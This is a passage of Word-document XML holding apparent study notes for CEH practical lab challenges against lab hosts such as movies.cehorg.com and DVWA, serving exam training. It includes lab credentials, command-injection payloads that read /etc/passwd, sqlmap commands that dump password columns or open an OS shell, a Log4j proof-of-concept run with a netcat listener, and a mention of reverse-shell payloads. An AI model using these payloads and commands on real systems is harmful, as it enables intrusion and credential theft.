    <w:p w:rsidR="4CC0B5BE" w:rsidP="4CC0B5BE" w:rsidRDefault="4CC0B5BE" w14:paraId="548C582E" w14:textId="69839B08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</w:p>
    <w:p w:rsidR="30046EA8" w:rsidP="4CC0B5BE" w:rsidRDefault="30046EA8" w14:paraId="5FF8E00B" w14:textId="02159259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1.8 Perform parameter tampering on movies.cehorg.com and find out the user for id 1003.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3D074322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3D074322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Input Format:</w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322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3D074322" w:rsidR="30046EA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Aaaaa</w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="73753C93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Linda is ans</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4F4044B8" w:rsidP="3D074322" w:rsidRDefault="4F4044B8" w14:paraId="35FB80F0" w14:textId="13C30A88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4F4044B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** This one is related to “perform </w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="4F4044B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sql</w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="4F4044B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injection on movies.cehorg.com and </w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="1127EB70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find out</w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="4F4044B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no of users </w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="295CD9B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available</w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="4F4044B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in </w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="25D4D52A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th</w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="6665E293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e </w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="6665E293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database.Use</w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="6665E293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Jason/welcome as login cred.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6665E293" w:rsidP="3D074322" w:rsidRDefault="6665E293" w14:paraId="31C6F1CE" w14:textId="1440B75A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6665E293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After logging </w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="6665E293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in  </w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="53261FC2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movies.cehorg.com</w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="53261FC2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-&gt; then go to-&gt; movies.cehorg.com/</w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="53261FC2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viewprofile.aspx?id</w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="53261FC2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=1003</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="14E1DE05" w:rsidP="3D074322" w:rsidRDefault="14E1DE05" w14:paraId="37DD9348" w14:textId="30DC6892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14E1DE0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IDOR,parameter</w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="14E1DE0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tampering broken authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3D074322" w:rsidP="3D074322" w:rsidRDefault="3D074322" w14:paraId="6B1EAE73" w14:textId="37D0FA01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</w:p>
    <w:p w:rsidR="14E1DE05" w:rsidP="3D074322" w:rsidRDefault="14E1DE05" w14:paraId="03D7D72F" w14:textId="2900AD33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0CE2BB63" w:rsidR="14E1DE0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1.9 You have identified a vulnerable web application on a </w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="14E1DE0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linux</w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="14E1DE0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server at port 8080.Exploit the web app vuln</w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63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, gain access to the server and enter the content of </w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63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rootflag</w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63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as ans. (Aa*</w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63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aaNNNN</w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63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)-as no </w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="5091757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subnet is given we have to scan every subnet for open </w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="5091757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port.other</w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="5091757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than 1, </w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="5091757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every</w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="5091757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8080 is filtered)</w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="32130DCB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[ </w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="32130DCB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github</w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="32130DCB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: ceh-engage-part-3.md]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37CC345D" w:rsidP="3D074322" w:rsidRDefault="37CC345D" w14:paraId="2804BAB9" w14:textId="1F41D367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- </w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322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nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="37CC345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–T4 –p 8080 172.16.0.0/24 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4EBDE818" w:rsidP="3D074322" w:rsidRDefault="4EBDE818" w14:paraId="7D758AB9" w14:textId="5076C1E3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4EBDE81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- </w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="4EBDE81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nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="4EBDE81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–T4 –p 8080 192.168.0.0/24 1 (suppose 192.168.0.55:8080 is open)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="111B3975" w:rsidP="3D074322" w:rsidRDefault="111B3975" w14:paraId="5A13F6FF" w14:textId="05AED5C9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- Gobuster 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dirb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–u </w:t>
      </w:r>
      <w:hyperlink r:id="R6dbd08a6ffeb4cc6">
        <w:r w:rsidRPr="3D074322" w:rsidR="111B3975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0"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://192.168.0.55:8080</w:t>
        </w:r>
      </w:hyperlink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-w /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usr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/share/wordlist/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dirb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/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="111B3975" w:rsidP="3D074322" w:rsidRDefault="111B3975" w14:paraId="11F20EB3" w14:textId="5DF859DA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Other than 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login,no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other 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dir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is found.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="111B3975" w:rsidP="3D074322" w:rsidRDefault="111B3975" w14:paraId="2B80AD9C" w14:textId="50241D9D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/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-Then search 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goFinance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exploit. There is a chance of Log4j vuln.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111B3975" w:rsidP="3D074322" w:rsidRDefault="111B3975" w14:paraId="3F4A9238" w14:textId="7A0B5964">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/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-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kozmer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github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for log4j script-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="660C474E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cd </w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="111B3975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log4j-shell.poc</w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="77DA1E4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-&gt;pip install –r requirement.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="77DA1E42" w:rsidP="3D074322" w:rsidRDefault="77DA1E42" w14:paraId="607A989E" w14:textId="0492C068">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/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3D074322" w:rsidR="77DA1E4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-python poc.py -h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="77DA1E42" w:rsidP="3D074322" w:rsidRDefault="77DA1E42" w14:paraId="6ED7BC1A" w14:textId="410B504F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/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3D074322" w:rsidR="77DA1E4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- python poc.py --</w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="77DA1E4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userip</w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="77DA1E4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10.10.1.10 --</w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="77DA1E4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webport</w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="77DA1E4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80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80 –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lport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9000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="07D0FE94" w:rsidP="3D074322" w:rsidRDefault="07D0FE94" w14:paraId="6B27BCD7" w14:textId="022E3524">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/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-In another terminal, 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command :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nc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–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lvp</w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="07D0FE94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9000 ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="25C46C05" w:rsidP="26253379" w:rsidRDefault="25C46C05" w14:paraId="36FE04EB" w14:textId="637C2F15">
      <w:pPr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26253379" w:rsidR="25C46C05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[</w:t>
      </w:r>
      <w:r w:rsidRPr="26253379" w:rsidR="58BF3357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</w:t>
      </w:r>
      <w:hyperlink r:id="R50a2c1b3dbb84df9">
        <w:r w:rsidRPr="26253379" w:rsidR="58BF3357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0"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=Ok0RRJpm86k&amp;t=</w:t>
        </w:r>
        <w:r w:rsidRPr="26253379" w:rsidR="58BF3357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0"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>3948s</w:t>
        </w:r>
        <w:r w:rsidRPr="26253379" w:rsidR="58BF3357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0"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>&amp;ab_channel=FireShark</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="25C46C05" w:rsidP="26253379" w:rsidRDefault="25C46C05" w14:paraId="4FA41C94" w14:textId="256584F9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26253379" w:rsidR="14440551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1.23.40 time]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="25C46C05" w:rsidP="26253379" w:rsidRDefault="25C46C05" w14:paraId="6540E023" w14:textId="165A6201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26253379" w:rsidR="58BF3357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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="03875348" w:rsidP="26253379" w:rsidRDefault="03875348" w14:paraId="722CBA97" w14:textId="6E8D88A4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26253379" w:rsidR="038753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1.10 Perform a command injection attack on 10.10.10.25 and find out how many user accounts are registered with the </w:t>
      </w:r>
      <w:r w:rsidRPr="26253379" w:rsidR="038753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machine.nb</w:t>
      </w:r>
      <w:r w:rsidRPr="26253379" w:rsidR="038753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ex</w:t>
      </w:r>
      <w:r w:rsidRPr="26253379" w:rsidR="428DF98F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clud</w:t>
      </w:r>
      <w:r w:rsidRPr="26253379" w:rsidR="0387534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e adm</w:t>
      </w:r>
      <w:r w:rsidRPr="26253379" w:rsidR="1D5DD48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in/Guest user. Set security to low</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1D5DD488" w:rsidP="26253379" w:rsidRDefault="1D5DD488" w14:paraId="1CE90966" w14:textId="15EA997C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26253379" w:rsidR="1D5DD48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- 127.0.0.1 &amp;&amp; ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1D5DD488" w:rsidP="26253379" w:rsidRDefault="1D5DD488" w14:paraId="1D050CA5" w14:textId="42B86CF4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26253379" w:rsidR="1D5DD48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- 127.0.0.1 &amp;&amp; </w:t>
      </w:r>
      <w:r w:rsidRPr="26253379" w:rsidR="1D5DD48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dir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2800FA6E" w:rsidP="26253379" w:rsidRDefault="2800FA6E" w14:paraId="1AD8E729" w14:textId="0C6B37EC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0CE2BB63" w:rsidR="2800FA6E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- 127.0.0.1 &amp;&amp; net user [ to check users]</w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="06950B9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= 8 </w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="06950B9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users(</w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="06950B9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without guest &amp; administrator)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04E0BEBD" w:rsidP="0CE2BB63" w:rsidRDefault="04E0BEBD" w14:paraId="34B491D1" w14:textId="4CCAD996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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="04E0BEB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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- for </w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="04E0BEB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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="04E0BEB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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 127.0.0.1 | cat /</w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="04E0BEB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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="04E0BEBD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26253379" w:rsidP="26253379" w:rsidRDefault="26253379" w14:paraId="23693BD1" w14:textId="2A128D8B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</w:p>
    <w:p w:rsidR="183DF0E7" w:rsidP="26253379" w:rsidRDefault="183DF0E7" w14:paraId="22C3D46F" w14:textId="35CFB0A4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</w:pPr>
      <w:r w:rsidRPr="26253379" w:rsidR="183DF0E7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1.11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A set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of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files has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been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uploaded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through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DVWA (</w:t>
      </w:r>
      <w:hyperlink r:id="R5a5129d3ab224e7c">
        <w:r w:rsidRPr="26253379" w:rsidR="183DF0E7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:lang w:val="es-EC"/>
          </w:rPr>
          <w:t>http://10.10.0.25:8080/DVWA</w:t>
        </w:r>
      </w:hyperlink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).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files are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located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in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"C:\wamp64\www\</w:t>
      </w:r>
      <w:r w:rsidRPr="26253379" w:rsidR="0C380BB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DVWA\</w:t>
      </w:r>
      <w:r w:rsidRPr="26253379" w:rsidR="0C380BB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hacckable</w:t>
      </w:r>
      <w:r w:rsidRPr="26253379" w:rsidR="0C380BB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\has.txt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"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directory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. Access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files and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decode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49CB6D2C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md5 hash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to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r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eveal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original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message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among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them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.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Enter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decrypted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message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as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answer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.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You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can log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into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DVWA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using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credentials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admin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/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password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. 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Use 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type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command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to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view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the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  <w:r w:rsidRPr="26253379" w:rsidR="6E9D10BB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file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(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Format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: A**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aaa</w:t>
      </w:r>
      <w:r w:rsidRPr="26253379" w:rsidR="183DF0E7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>*AA)</w:t>
      </w:r>
      <w:r w:rsidRPr="26253379" w:rsidR="6B6D4D19">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0A89BD2D" w:rsidP="0CE2BB63" w:rsidRDefault="0A89BD2D" w14:paraId="33AFD91B" w14:textId="3BC59E87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0CE2BB63" w:rsidR="0A89BD2D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 </w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="31E1F953">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 | cat "/home/parrot/Desktop/CV New/secret.txt" [for </w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="31E1F953">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="31E1F953">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="31E1F953" w:rsidP="0CE2BB63" w:rsidRDefault="31E1F953" w14:paraId="08717285" w14:textId="66158F73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sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="31E1F953">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="31E1F9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C:\wamp64\www\DVWA\hackable\uploads\Hash.txt. Put the hash into hashes website to get the answer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0A89BD2D" w:rsidP="26253379" w:rsidRDefault="0A89BD2D" w14:paraId="2F225B0F" w14:textId="5D14BAF8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26253379" w:rsidR="0A89BD2D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 then decrypt the hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26253379" w:rsidP="26253379" w:rsidRDefault="26253379" w14:paraId="01EA9D0C" w14:textId="1E694F30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</w:p>
    <w:p w:rsidR="0A89BD2D" w:rsidP="26253379" w:rsidRDefault="0A89BD2D" w14:paraId="1FE11FCE" w14:textId="1794E2C9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26253379" w:rsidR="0A89BD2D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1.12 Perform a banner grabbing on the web application movies.cehorg.com and find the ETag of the respective target machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5AFC71E7" w:rsidP="26253379" w:rsidRDefault="5AFC71E7" w14:paraId="0A084395" w14:textId="29A6DC74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26253379" w:rsidR="5AFC71E7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 </w:t>
      </w:r>
      <w:r w:rsidRPr="26253379" w:rsidR="507DE7A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nc</w:t>
      </w:r>
      <w:r w:rsidRPr="26253379" w:rsidR="507DE7A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</w:t>
      </w:r>
      <w:r w:rsidRPr="26253379" w:rsidR="507DE7A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vv</w:t>
      </w:r>
      <w:r w:rsidRPr="26253379" w:rsidR="507DE7A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movies.cehorg.com 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="507DE7AC" w:rsidP="26253379" w:rsidRDefault="507DE7AC" w14:paraId="54D0D54A" w14:textId="2F8306FB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="507DE7AC">
        <w:drawing>
          <wp:inline wp14:editId="3CED6863" wp14:anchorId="14786EDE">
            <wp:extent cx="4990047" cy="1634617"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2068408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9c5d168b7e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047" cy="16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53379" w:rsidP="26253379" w:rsidRDefault="26253379" w14:paraId="49E785DD" w14:textId="6F7FF228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</w:p>
    <w:p w:rsidR="26253379" w:rsidP="26253379" w:rsidRDefault="26253379" w14:paraId="04DCC62D" w14:textId="486042FC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4CAF42F3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1.13 Perform </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="4CAF42F3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an</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="4CAF42F3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4CAF42F3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sql</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="4CAF42F3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injection attack on movies.cehorg.com and find out the number of users </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="4CAF42F3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availabe</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="4CAF42F3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in </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="7CF905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the database. Cred: </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="7CF905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jason</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="7CF905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/welcome</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7CF9059E" w:rsidP="5787A77D" w:rsidRDefault="7CF9059E" w14:paraId="400A398A" w14:textId="1C341259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CF905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 login-&gt;go to view profile/any end to get id=1? Type </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="7CF905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url</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="7CF905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entry point</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4122EEDA" w:rsidP="5787A77D" w:rsidRDefault="4122EEDA" w14:paraId="18688021" w14:textId="07351057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sqlmap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-&gt; use cookie ( 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document.cookie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)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4122EEDA" w:rsidP="5787A77D" w:rsidRDefault="4122EEDA" w14:paraId="665BFBAA" w14:textId="7D49C376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sqlmap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–u “link” --cookie –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dbs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4122EED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etc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F029C2F" w:rsidP="5787A77D" w:rsidRDefault="0F029C2F" w14:paraId="1B02EDF8" w14:textId="3EB2044A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 </w:t>
      </w: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sqlmap</w:t>
      </w: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–u “link” --cookie=”</w:t>
      </w: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hdfh</w:t>
      </w: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=;” -D </w:t>
      </w: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moviescope</w:t>
      </w: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–T </w:t>
      </w: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Login.User</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="0D61EE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,User_Login</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="0D61EE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–C </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="0D61EE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isadmin,password,Uid,Uname</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="0D61EE9E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--dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F029C2F" w:rsidP="5787A77D" w:rsidRDefault="0F029C2F" w14:paraId="0610381E" w14:textId="1F1E3E59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0F029C2F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--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7AE1C3F1" w:rsidP="5787A77D" w:rsidRDefault="7AE1C3F1" w14:paraId="25DD6E8F" w14:textId="731B82F4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0CE2BB63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1.14 Perform web crawling on the webpage movies.cehorg.com and </w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63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identfy</w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63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the number of live </w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63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pngs</w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="504C90DD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in Image folder</w:t>
      </w:r>
      <w:r w:rsidRPr="0CE2BB63" w:rsidR="6B801859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====&gt; use zap=&gt; check github</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7AE1C3F1" w:rsidP="5787A77D" w:rsidRDefault="7AE1C3F1" w14:paraId="2B6ACF83" w14:textId="56B785B5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(1.13 + </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7AE1C3F1" w:rsidP="5787A77D" w:rsidRDefault="7AE1C3F1" w14:paraId="4ADFC168" w14:textId="7CBF0165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 sqlmap –u “link” --cookie=”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hdfh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=;” -D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moviescope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–T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Login.User,User_Login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–C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isadmin,password,Uid,Uname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–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os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-shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7AE1C3F1" w:rsidP="5787A77D" w:rsidRDefault="7AE1C3F1" w14:paraId="1361725D" w14:textId="61C8AEBF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 after getting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os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shell: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7AE1C3F1" w:rsidP="5787A77D" w:rsidRDefault="7AE1C3F1" w14:paraId="529A1DFB" w14:textId="2DCB9E64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pwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7AE1C3F1" w:rsidP="5787A77D" w:rsidRDefault="7AE1C3F1" w14:paraId="3D3F26D4" w14:textId="54049234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-whoami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7AE1C3F1" w:rsidP="5787A77D" w:rsidRDefault="7AE1C3F1" w14:paraId="587EC2D6" w14:textId="3B1CD480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-ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7AE1C3F1" w:rsidP="5787A77D" w:rsidRDefault="7AE1C3F1" w14:paraId="2F18FB10" w14:textId="125116DA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- ls kore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kore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check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dite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hobe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live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png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jekono</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="7AE1C3F1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directory te thakte pare</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="131E9EEA" w:rsidP="5787A77D" w:rsidRDefault="131E9EEA" w14:paraId="55CDF142" w14:textId="084E4005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sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5787A77D" w:rsidR="131E9EEA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****Need to make payload. Use </w:t>
      </w:r>
      <w:hyperlink r:id="R0c81e6906bae4c51">
        <w:r w:rsidRPr="5787A77D" w:rsidR="131E9EEA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Online - Reverse Shell Generator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="5787A77D" w:rsidR="131E9EEA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to make payload</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="3AE475D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (video 2:11:17)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="23B7E32C" w:rsidP="5787A77D" w:rsidRDefault="23B7E32C" w14:paraId="570673EC" w14:textId="75F68DCB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1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="7D8A481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5</w:t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23B7E32C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CEHORG</w:t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suspects of a </w:t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possible session</w:t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hijacking attack on a machine in its network. The organisation has retained the network traffic data for the session at</w:t>
      </w:r>
      <w:r>
        <w:br/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 w:rsidRPr="5787A77D" w:rsidR="23B7E32C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\Admin\Documents in the EH Workstation – 2 as sniffsession.pcap</w:t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.</w:t>
      </w:r>
      <w:r>
        <w:br/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You have been assigned a task to perform an analysis and find out the </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="23B7E32C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>protocol that has been used for sniffing</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="23B7E32C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on its network.</w:t>
      </w:r>
